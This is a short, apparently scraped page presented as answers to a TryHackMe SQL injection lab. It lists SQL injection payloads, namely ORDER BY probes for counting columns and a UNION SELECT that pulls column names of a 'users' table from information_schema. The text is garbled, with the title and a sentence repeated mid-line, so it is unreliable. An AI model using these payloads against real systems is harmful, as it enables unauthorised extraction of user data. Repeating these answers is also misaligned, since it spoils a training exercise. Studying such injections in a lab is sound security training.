Tryhackme Sql Injection Lab Answers [8K]
Let's assume we found a table named users . We now need to know the column names inside that table to extract the data.
' ORDER BY 1-- ' ORDER BY 2-- ' ORDER BY 3-- tryhackme sql injection lab answers
' UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name = 'users'-- Let's assume we found a table named users
